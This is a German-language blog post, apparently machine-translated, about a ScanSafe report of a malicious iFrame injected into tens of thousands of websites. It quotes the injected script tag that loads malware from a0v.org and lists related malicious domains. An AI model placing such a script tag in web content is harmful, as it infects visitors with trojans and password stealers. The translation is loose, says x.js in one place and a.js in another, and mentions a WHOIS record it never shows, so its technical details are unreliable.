ScanSafe löst Alarm wegen Tausender gefährdeter Webseiten aus

ScanSafe ist ein anerkannter Anbieter von SaaS-Web-Sicherheit (Software as a Service). Ich versuche, auf ihren STAT-Blog zu achten, der normalerweise wertvolle Informationen enthält. Der heutige Tag war keine Ausnahme, wie der Titel des Blogposts voraussagte: Bis zu 55.000 Kompromittiert durch Potent Backdoor / Data Theft Cocktail.

Berüchtigter iFrame

Mary Landesman, Autorin des ominös klingenden Posts von ScanSafe, hat irgendwie einen böswilligen iFrame gefunden, der in über 55.000 Websites eingebettet ist. Das bedeutete mir nicht viel, bis ich herausfand, was ein iFrame war. Laut der Web Design Group besteht ein iFrame aus:

"Das IFRAME-Element definiert einen Inline-Frame für die Aufnahme externer Objekte einschließlich anderer HTML-Dokumente. IFRAME bietet ähnliche Funktionen wie OBJECT. Ein Vorteil von IFRAME besteht darin, dass es als Ziel für andere Links fungieren kann."

Der letzte Satz ist derjenige, auf den man achten muss. In diesem speziellen Fall enthält der iFrame den folgenden Codeausschnitt:

"script src = http: //a0v.org/x.js"

Wenn ich das richtig verstehe, leitet dieser einfache Satz Webbrowser zu http://a0v.org/a.js weiter, ohne dass der Benutzer es weiß.

Was passiert dann

Auf der Website a0v.org befindet sich die Hochleistungs-Malware. Sobald der Webbrowser mit a0v.org spricht, erklärt Landesman eine Reihe von Schadcode, der aus Trojanern, Hintertüren, Passwortdiebstahlern und möglicherweise einem Downloader besteht, der versucht, ihn auf dem besuchenden Computer zu installieren. Wenn das Betriebssystem Windows-basiert und anfällig ist, wird die Malware erfolgreich installiert.

Ja, dies ist wieder ein Windows-Problem. Glücklicherweise sind alle unsere Computer auf dem neuesten Stand und verfügen über einen ausreichenden Schutz, um zu verhindern, dass Malware Wurzeln schlägt. Richtig?

Hör zu

Was mich fasziniert, ist, dass wir Landesmans Experiment wiederholen können, um leicht herauszufinden, wie viele Webseiten derzeit infiziert sind. Geben Sie "script src = http: //a0v.org/x.js" in Ihre bevorzugte Suchmaschine ein und überprüfen Sie die Anzahl der Treffer.

Als Landesman den Beitrag zum ersten Mal schrieb, fand die Google-Suche 54.900 Treffer. Ich bekomme einen Tag später 97.200 Treffer. Einige der Websites umfassen feedzilla.com, latindiscover.com und Foodsresourcebank.org. Vielleicht ist es absichtlich, aber niemand erklärt, warum die Anzahl infizierter Webseiten so schnell wächst.

A0v.org ist nicht das einzige schädliche Webziel. Andere umfassen: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info und game158.info. Landesman erwähnt, dass ahthja.info das produktivste der Gruppe ist. Vielleicht finden Sie den WHOIS-Datensatz für ahthja.info interessant:

Beachten Sie die ungewöhnlichen Registranten- und Straßennamen. Es scheint, als ob bei diesem speziellen Registrar nur sehr wenig überprüft wird.

Fang 22

Ich bin kein Webentwickler. Es scheint jedoch, dass wir dieses Problem haben werden, bis clientseitiges Scripting sicher ausgeführt werden kann. Sicher, das Deaktivieren von JavaScript oder die Verwendung einer Anwendung wie NoScript löst das Problem. Bis Sie sehen möchten, was auf der Website nicht funktioniert.

Abschließende Gedanken

Ich habe eine ziemlich gute Idee, warum so viele Computer anfällig sind. Aber was ist mit Webservern los? Sind die aktuellen Webserver-Exploits so neu, dass nur die Bösen davon wissen? Es scheint sicher so.

© Copyright 2021 | pepebotifarra.com